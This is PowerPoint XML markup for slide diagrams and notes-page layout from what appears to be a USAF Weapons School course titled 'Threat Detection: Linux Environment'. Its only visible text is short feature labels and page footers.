    <dgm:cxn modelId="{ADBE6B89-51A2-4769-BF6C-71E40255216F}" type="presOf" srcId="{69642567-153E-47BE-8031-4632E07C179A}" destId="{CD5C2E3D-D136-45A1-9BB8-C562D2F85A02}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{069AE432-8920-4C10-940C-260B1B00472F}" srcId="{6BD7B6B7-0033-4193-86AF-79B0CEAF4CDF}" destId="{9E591E3B-7652-46E4-AACB-1751DD36668A}" srcOrd="3" destOrd="0" parTransId="{A96116DF-4AAC-469B-B9C5-F84E36ACF0BC}" sibTransId="{6D5EE5F5-544C-4C61-9EAF-E06519D29190}"/>
    <dgm:cxn modelId="{EC365F84-C0BC-460F-B6D7-65EDB4B23702}" srcId="{6BD7B6B7-0033-4193-86AF-79B0CEAF4CDF}" destId="{2D0B27F6-D3C4-4CC7-A10E-B26155E37AE3}" srcOrd="4" destOrd="0" parTransId="{ACDB6755-F333-4CC1-B3CB-9EA8D806907C}" sibTransId="{F25F5222-9E06-46D0-815B-39B73103FB0C}"/>
    <dgm:cxn modelId="{2D1E90DD-62CD-4BA9-856D-BFF0559A07AD}" srcId="{6BD7B6B7-0033-4193-86AF-79B0CEAF4CDF}" destId="{CB3A5AA9-ECB7-49B4-BCFC-186F675F110A}" srcOrd="0" destOrd="0" parTransId="{77757943-7B45-4271-969A-78657A3C57D8}" sibTransId="{2E853EDC-E85F-494D-8A30-9A4EEEEF37C2}"/>
    <dgm:cxn modelId="{0FB05590-77AF-440E-B76C-3756678AD412}" type="presOf" srcId="{2D0B27F6-D3C4-4CC7-A10E-B26155E37AE3}" destId="{24C6BFAB-DB7E-451D-ACD9-C8EBCA2E38DE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{0399856B-9857-4558-A660-C5EBF171563B}" type="presOf" srcId="{549E31C8-44E3-4268-9DC2-C7F2BB8BC29C}" destId="{80348DF5-9B2D-4259-A361-5CFE9012B00D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{C3C2F405-2BEF-46DB-B865-089DEA22022A}" type="presParOf" srcId="{F9CC8C24-7210-468D-AFED-82EE2FDADBD6}" destId="{18C36D35-84F4-4D40-B1EE-9F60AD4D0055}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{4ADF2B70-956D-4AD4-8207-B92836B72F58}" type="presParOf" srcId="{18C36D35-84F4-4D40-B1EE-9F60AD4D0055}" destId="{5ED8E1F3-AEDC-4593-AB7C-2F03C86A5EB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{7DDB5D52-C353-4E76-9BFA-118361C0715A}" type="presParOf" srcId="{5ED8E1F3-AEDC-4593-AB7C-2F03C86A5EB0}" destId="{533A9185-8313-437B-B63C-0BABF5B0E51A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{CD6376E7-BA17-49D5-B0A2-A879ACAFDCB6}" type="presParOf" srcId="{5ED8E1F3-AEDC-4593-AB7C-2F03C86A5EB0}" destId="{CE1730C6-131A-4E6F-99A3-D7387A5B31A1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{9EB500CF-49DD-4B58-9AE0-06973EDB3C7B}" type="presParOf" srcId="{5ED8E1F3-AEDC-4593-AB7C-2F03C86A5EB0}" destId="{998804C4-457C-4BF0-AB5B-1AAB473B5389}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{02B2B585-5CC2-4817-8FF0-78CAE534E640}" type="presParOf" srcId="{5ED8E1F3-AEDC-4593-AB7C-2F03C86A5EB0}" destId="{B6E6BC6F-58DC-44E4-8DED-4D7BDE1C8285}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{17EA33E5-2EFB-4613-AEFB-31F936473E4E}" type="presParOf" srcId="{18C36D35-84F4-4D40-B1EE-9F60AD4D0055}" destId="{D274FCCB-3661-4454-A385-F3E910488318}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{644542A7-259A-47EA-98CD-C1776AA03EC0}" type="presParOf" srcId="{18C36D35-84F4-4D40-B1EE-9F60AD4D0055}" destId="{3B10B240-72C0-46A0-8DC7-E3D9FA2A35FE}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{E9ECB188-8EF5-4DF5-B531-530E1239679E}" type="presParOf" srcId="{3B10B240-72C0-46A0-8DC7-E3D9FA2A35FE}" destId="{DA988CAA-6DA2-412A-BF2F-8E552896EDEF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{7505FF31-E8CF-4E7D-A856-267E5389B613}" type="presParOf" srcId="{18C36D35-84F4-4D40-B1EE-9F60AD4D0055}" destId="{CD5C2E3D-D136-45A1-9BB8-C562D2F85A02}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{782B0628-A653-448E-937C-58FF3270A444}" type="presParOf" srcId="{18C36D35-84F4-4D40-B1EE-9F60AD4D0055}" destId="{92026A5E-D3C4-4E5D-9293-FBA7F9FEF553}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{6ECA2DDC-266A-408A-9EB0-E563E244727B}" type="presParOf" srcId="{92026A5E-D3C4-4E5D-9293-FBA7F9FEF553}" destId="{02E9B703-E621-426B-A16B-9564D83FA74D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{AB2DB02D-8327-46B9-B3F0-EBD38588CE30}" type="presParOf" srcId="{18C36D35-84F4-4D40-B1EE-9F60AD4D0055}" destId="{80348DF5-9B2D-4259-A361-5CFE9012B00D}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{DE24ECDB-5B5F-4498-A86A-4B3B515D94D0}" type="presParOf" srcId="{18C36D35-84F4-4D40-B1EE-9F60AD4D0055}" destId="{88C6423C-F3AD-4437-A339-3780ECF699A3}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{D2049F23-F486-4A9B-8C4A-8B3BAE5FAEAC}" type="presParOf" srcId="{88C6423C-F3AD-4437-A339-3780ECF699A3}" destId="{ACA340E8-39E5-43BD-843D-8C3A891EC869}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{32E73EB8-9DE1-44E5-991E-61B0567892D8}" type="presParOf" srcId="{18C36D35-84F4-4D40-B1EE-9F60AD4D0055}" destId="{78060922-DBD4-4596-95BE-0171A098DBB0}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{7C5E1385-B118-41D7-9D10-ED9F59A40ABB}" type="presParOf" srcId="{18C36D35-84F4-4D40-B1EE-9F60AD4D0055}" destId="{629B6E61-1C0E-46A7-934D-ACB2FDE2737D}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{979D8BAF-54CF-4F4A-9A61-2947379B0B13}" type="presParOf" srcId="{629B6E61-1C0E-46A7-934D-ACB2FDE2737D}" destId="{67EC25D0-D03C-468F-90FC-4972AA00968A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{1189F525-A58D-42F8-8530-E0CBADA26680}" type="presParOf" srcId="{18C36D35-84F4-4D40-B1EE-9F60AD4D0055}" destId="{24C6BFAB-DB7E-451D-ACD9-C8EBCA2E38DE}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{753F85BE-B322-4660-8B3F-70364986DCF6}" type="presParOf" srcId="{18C36D35-84F4-4D40-B1EE-9F60AD4D0055}" destId="{21F6FDCC-E516-403A-BE63-6FA3B19004C4}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{43BD6F02-5B5A-4A2E-B86F-7051C06C1D1E}" type="presParOf" srcId="{21F6FDCC-E516-403A-BE63-6FA3B19004C4}" destId="{2CE816EE-6817-49F9-8CAC-6DAFCE20A2F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1730C6-131A-4E6F-99A3-D7387A5B31A1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="-5232756" y="-801464"/>
          <a:ext cx="6231213" cy="6231213"/>
        </a:xfrm>
        <a:prstGeom prst="blockArc">
          <a:avLst>
            <a:gd name="adj1" fmla="val 18900000"/>
            <a:gd name="adj2" fmla="val 2700000"/>
            <a:gd name="adj3" fmla="val 347"/>
          </a:avLst>
        </a:prstGeom>
        <a:noFill/>
        <a:ln w="2540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274FCCB-3661-4454-A385-F3E910488318}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="436681" y="289175"/>
          <a:ext cx="5946208" cy="578720"/>
        </a:xfrm>
        <a:prstGeom prst="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9360" tIns="78740" rIns="78740" bIns="78740" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="1377950">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="3100" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>High stability</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3100" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="436681" y="289175"/>
        <a:ext cx="5946208" cy="578720"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DA988CAA-6DA2-412A-BF2F-8E552896EDEF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="74981" y="216835"/>
          <a:ext cx="723400" cy="723400"/>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CD5C2E3D-D136-45A1-9BB8-C562D2F85A02}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="851375" y="1156978"/>
          <a:ext cx="5531514" cy="578720"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="1800000"/>
            <a:satOff val="-19203"/>
            <a:lumOff val="573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9360" tIns="78740" rIns="78740" bIns="78740" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="1377950">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="3100" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Security</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3100" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="851375" y="1156978"/>
        <a:ext cx="5531514" cy="578720"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{02E9B703-E621-426B-A16B-9564D83FA74D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="489675" y="1084638"/>
          <a:ext cx="723400" cy="723400"/>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80348DF5-9B2D-4259-A361-5CFE9012B00D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="978653" y="2024781"/>
          <a:ext cx="5404236" cy="578720"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="3600000"/>
            <a:satOff val="-38406"/>
            <a:lumOff val="1147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9360" tIns="78740" rIns="78740" bIns="78740" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="1377950">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="3100" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Easy to operate</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3100" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="978653" y="2024781"/>
        <a:ext cx="5404236" cy="578720"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ACA340E8-39E5-43BD-843D-8C3A891EC869}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="616953" y="1952441"/>
          <a:ext cx="723400" cy="723400"/>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78060922-DBD4-4596-95BE-0171A098DBB0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="851375" y="2892584"/>
          <a:ext cx="5531514" cy="578720"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="5400000"/>
            <a:satOff val="-57609"/>
            <a:lumOff val="1720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9360" tIns="78740" rIns="78740" bIns="78740" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="1377950">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="3100" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Hardware compatibility</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3100" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="851375" y="2892584"/>
        <a:ext cx="5531514" cy="578720"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{67EC25D0-D03C-468F-90FC-4972AA00968A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="489675" y="2820244"/>
          <a:ext cx="723400" cy="723400"/>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24C6BFAB-DB7E-451D-ACD9-C8EBCA2E38DE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="436681" y="3760388"/>
          <a:ext cx="5946208" cy="578720"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="7200000"/>
            <a:satOff val="-76812"/>
            <a:lumOff val="2294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9360" tIns="78740" rIns="78740" bIns="78740" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="1377950">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="3100" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Open source</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3100" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="436681" y="3760388"/>
        <a:ext cx="5946208" cy="578720"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2CE816EE-6817-49F9-8CAC-6DAFCE20A2F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="74981" y="3688048"/>
          <a:ext cx="723400" cy="723400"/>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13" name="Group 141"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="432064" y="823887"/>
            <a:ext cx="6147793" cy="7644015"/>
            <a:chOff x="228" y="519"/>
            <a:chExt cx="3860" cy="4733"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3214" name="Rectangle 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="519"/>
              <a:ext cx="3860" cy="4733"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3215" name="Line 143"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2160" y="522"/>
              <a:ext cx="2" cy="4722"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3218" name="Rectangle 146"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="413808" y="8523238"/>
            <a:ext cx="6190391" cy="243644"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="44444" rIns="90475" bIns="44444">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="61208" defTabSz="913525">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="6114644" algn="r"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Study Guide • USAF Weapons School • Aug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	page </a:t>
            </a:r>
            <a:fld id="{B1692CF7-9DCA-42C4-AA69-832C3D5AB963}" type="slidenum">
              <a:rPr lang="en-US" sz="1000" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr indent="61208" defTabSz="913525">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:tabLst>
                  <a:tab pos="6114644" algn="r"/>
                </a:tabLst>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>22</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 139"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="404278" y="346835"/>
            <a:ext cx="6195441" cy="355112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="65000"/>
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="87209" tIns="42840" rIns="87209" bIns="42840">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="880547">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CWU918KD, Threat Detection: Linux Environment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16859105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4" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="544974" y="8578327"/>
            <a:ext cx="5888736" cy="243644"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="44444" rIns="0" bIns="44444">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="913525">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="6094752" algn="r"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lesson Plan • USAF Weapons School • </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aug 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page </a:t>
            </a:r>
            <a:fld id="{1D3BF392-DF7D-44F4-8E68-4A751A44C1E1}" type="slidenum">
              <a:rPr lang="en-US" sz="1000" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr defTabSz="913525">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:tabLst>
                  <a:tab pos="6094752" algn="r"/>
                </a:tabLst>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of 75</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2075" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1811338" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2076" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="556816" y="2954311"/>
            <a:ext cx="5888736" cy="5604401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
